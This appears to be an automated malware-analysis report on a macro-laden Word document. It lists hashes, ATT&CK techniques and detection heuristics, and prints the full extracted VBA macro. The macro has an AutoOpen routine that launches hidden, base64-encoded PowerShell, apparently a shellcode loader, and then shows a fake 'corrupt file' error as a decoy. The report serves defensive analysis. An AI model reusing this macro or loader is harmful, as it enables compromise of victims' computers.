Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db53b4157868fffd…

MALICIOUS

Office (OLE)

Size: 39.0 KB
Created: 2018-09-09 09:44:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 10d12a4363a4ca5cb369edd4d6df108e
SHA-1: 9ff035e1d7517ac3c081a1a25382fa862dd1f87d
SHA-256: db53b4157868fffd0331c1498e2209c11499b14f5aa980fe4fb3453858ed90b5
Risk score: 312

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains VBA macros with an AutoOpen subroutine that executes a PowerShell command. The PowerShell command is heavily obfuscated but appears to download and execute a second-stage payload. The document body uses a common lure to convince users to enable macros.

Heuristics (10)

  • ClamAV: Doc.Dropper.MagicHound-5859115-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.MagicHound-5859115-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    & "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A"
    Shell ("powershell.exe " & x)
    Dim title As String
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    & "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A"
    Shell ("powershell.exe " & x)
    Dim title As String
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
    Dim x
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7739 bytes
SHA-256: 91c68affec5595a95b7a5b4a448a5e7fa75e69982ad695d609ba536010bc42f5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 18 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim x
x = "-window hidden -e JABHADgAdAAgAD0AIAAnACQAQgBtAHQAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8" _
& "AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgA" _
& "gAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQ" _
& "AcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAQgBtAHQAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAA" _
& "wAHgAYgBhACwAMAB4AGYANwAsADAAeABjADYALAAwAHgANABlACwAMAB4ADAAMwAsADAAeABkADkALAAwAHgAZQBiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADAAMwAsADAAeAA1ADAALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlADgALAAwAHgAMABiACwAMAB4ADIANAAsADAAeABiAGIALAAwAHgAZgBmACwAMAB4ADE" _
& "AYgAsADAAeAAyAGIALAAwAHgANAA0ACwAMAB4ADAAMAAsADAAeABkAGIALAAwAHgANABjACwAMAB4AGMAYwAsADAAeABlADUALAAwAHgAZQBhACwAMAB4ADQAYwAsADAAeABhAGEALAAwAHgANgBlACwAMAB4ADUAYwAsADAAeAA3AGQALAAwAHgAYgA4ACwAMAB4ADIAMwAsADAAeAA1ADAALAAwAHgAZgA2ACwAMAB4AGUAYwAsADAAeABkADcALAAwAHgAZQAzACwAMAB4ADcAYQAsADAAeAAzADkALAAwAHgAZAA3ACwAMAB4ADQANAAsADAAeAAzADAALAAwAHgAMQBmACwAMAB4AGQANgAsADAAeAA1ADUALAA" _
& "wAHgANgA5ACwAMAB4ADYAMwAsADAAeAA3ADkALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeABiADAALAAwAHgANQA5ACwAMAB4AGUANAAsADAAeABiAGEALAAwAHgAYwA1ACwAMAB4ADkAOAAsADAAeAAyADEALAAwAHgAYQA2ACwAMAB4ADIANAAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGEAYwAsADAAeAA5AGIALAAwAHgAZgBkACwAMAB4ADgAZgAsADAAeABmADkALAAwAHgAMgA3ACwAMAB4ADcANQAsADAAeABjADMALAAwAHgAZQBjACwAMAB4ADIAZgAsADAAeAA2AGEALAAwAHgAOQAzACwAMAB4ADA" _
& "AZgAsADAAeAAwADEALAAwAHgAMwBkACwAMAB4AGEAOAAsADAAeAA0ADkALAAwAHgAOAAxACwAMAB4AGIAZgAsADAAeAA3AGQALAAwAHgAZQAyACwAMAB4ADgAOAAsADAAeABhADcALAAwAHgANgAyACwAMAB4AGMAZgAsADAAeAA0ADMALAAwAHgANQAzACwAMAB4ADUAMAAsADAAeABiAGIALAAwAHgANQA1ACwAMAB4AGIANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4AGYAOQAsADAAeABmADgALAAwAHgAMAA2ACwAMAB4AGIANwAsADAAeAAwADMALAAwAHgAMwBjACwAMAB4AGEAMAAsADAAeAAyADgALAA" _
& "wAHgANwA2ACwAMAB4ADMANAAsADAAeABkADMALAAwAHgAZAA1ACwAMAB4ADgAMQAsADAAeAA4ADMALAAwAHgAYQBlACwAMAB4ADAAMQAsADAAeAAwADcALAAwAHgAMQAwACwAMAB4ADAAOAAsADAAeABjADEALAAwAHgAYgBmACwAMAB4AGYAYwAsADAAeABhADkALAAwAHgAMAA2ACwAMAB4ADUAOQAsADAAeAA3ADYALAAwAHgAYQA1ACwAMAB4AGUAMwAsADAAeAAyAGQALAAwAHgAZAAwACwAMAB4AGEAOQAsADAAeABmADIALAAwAHgAZQAyACwAMAB4ADYAYQAsADAAeABkADUALAAwAHgANwBmACwAMAB4ADA" _
& "ANQAsADAAeABiAGQALAAwAHgANQBjACwAMAB4ADMAYgAsADAAeAAyADIALAAwAHgAMQA5ACwAMAB4ADAANQAsADAAeAA5AGYALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABlADMALAAwAHgANABlACwAMAB4ADcAMwAsADAAeAA1AGEALAAwAHgANABjACwAMAB4ADIAZQAsADAAeABkADEALAAwAHgAMQAwACwAMAB4ADYAMAAsADAAeAAzAGIALAAwAHgANgA4ACwAMAB4ADcAYgAsADAAeABlAGMALAAwAHgAOAA4ACwAMAB4ADQAMQAsADAAeAA4ADQALAAwAHgAZQBjACwAMAB4ADgANgAsADAAeABkADIALAA" _
& "wAHgAZgA3ACwAMAB4AGQAZQAsADAAeAAwADkALAAwAHgANAA5ACwAMAB4ADkAMAAsADAAeAA1ADIALAAwAHgAYwAxACwAMAB4ADUANwAsADAAeAA2ADcALAAwAHgAOQA1ACwAMAB4AGYAOAAsADAAeAAyADAALAAwAHgAZgA3ACwAMAB4ADYAOAAsADAAeAAwADMALAAwAHgANQAxACwAMAB4AGQAMQAsADAAeABhAGUALAAwAHgANQA3ACwAMAB4ADAAMQAsADAAeAA0ADkALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAOAA5ACwAMAB4AGEAOAAsADAAeAAwAGQALAAwAHgANgA2ACwAMAB4ADg" _
& "AZgAsADAAeAAzAGUALAAwAHgANgBlACwAMAB4AGQAZgAsADAAeAA4ADUALAAwAHgAYQBjACwAMAB4ADAANgAsADAAeAAyADIALAAwAHgAOQBhACwAMAB4AGMANQAsADAAeAA2ADUALAAwAHgAYQBiACwAMAB4ADcAYwAsADAAeABiADUALAAwAHgAZAA5ACwAMAB4AGYAYwAsADAAeABkADAALAAwAHgANwA1ACwAMAB4ADgAYQAsADAAeABiAGMALAAwAHgAOAAwACwAMAB4ADEAZAAsADAAeABjADAALAAwAHgAMwAyACwAMAB4AGYAZQAsADAAeAAzAGQALAAwAHgAZQBiACwAMAB4ADkAOAAsADAAeAA5ADcALAA" _
& "wAHgAZAA3ACwAMAB4ADAANAAsADAAeAA3ADUALAAwAHgAYwBmACwAMAB4ADQAZgAsADAAeABiAGMALAAwAHgAZABjACwAMAB4ADkAYgAsADAAeABlAGUALAAwAHgANAAxACwAMAB4AGMAYgAsADAAeABlADEALAAwAHgAMwAwACwAMAB4AGMAOQAsADAAeABmADgALAAwAHgAMQA2ACwAMAB4AGYAZQAsADAAeAAzAGEALAAwAHgANwA0ACwAMAB4ADAANQAsADAAeAA5ADYALAAwAHgAYwBhACwAMAB4AGMAMwAsADAAeAA3ADcALAAwAHgAMwAwACwAMAB4AGQANAAsADAAeABmADkALAAwAHgAMQAyACwAMAB4AGI" _
& "AYwAsADAAeAA0ADAALAAwAHgAMAA2ACwAMAB4AGIANQAsADAAeABlAGIALAAwAHgAZgBjACwAMAB4ADAANAAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGEAMgAsADAAeABmADcALAAwAHgAYwA3ACwAMAB4ADUAMAAsADAAeAA2AGEALAAwAHgANgAyACwAMAB4AGEAOAAsADAAeAAwAGUALAAwAHgAOQAzACwAMAB4ADYAMgAsADAAeAAyADgALAAwAHgAYwBlACwAMAB4AGMANQAsADAAeABlADgALAAwAHgAMgA4ACwAMAB4AGEANgAsADAAeABiADEALAAwAHgANAA4ACwAMAB4ADcAYgAsADAAeABkADMALAA" _
& "wAHgAYgBkACwAMAB4ADQANAAsADAAeABlAGYALAAwAHgANAA4ACwAMAB4ADIAOAAsADAAeAA2ADcALAAwAHgANAA2ACwAMAB4ADMAZAAsADAAeABmAGIALAAwAHgAMABmACwAMAB4ADYANAAsADAAeAAxADgALAAwAHgAYwBiACwAMAB4ADgAZgAsADAAeAA5ADcALAAwAHgANABmACwAMAB4AGMAZAAsADAAeABlAGMALAAwAHgANAAxACwAMAB4AGEAOQAsADAAeABiAGIALAAwAHgAMQBjACwAMAB4ADUAMgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGc" _
& "AdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAQwB3AGgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAEMAdwBoAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQA" _
& "sACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABDAHcAaAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGU" _
& "ALgBHAGUAdABCAHkAdABlAHMAKAAkAEcAOAB0ACkAKQA7ACQAQwBIAFMAIAA9ACAAIgAtAGUAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkAGsAdwB2AEYAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAawB3AHYARgAgACQAQwB" _
& "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A"
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub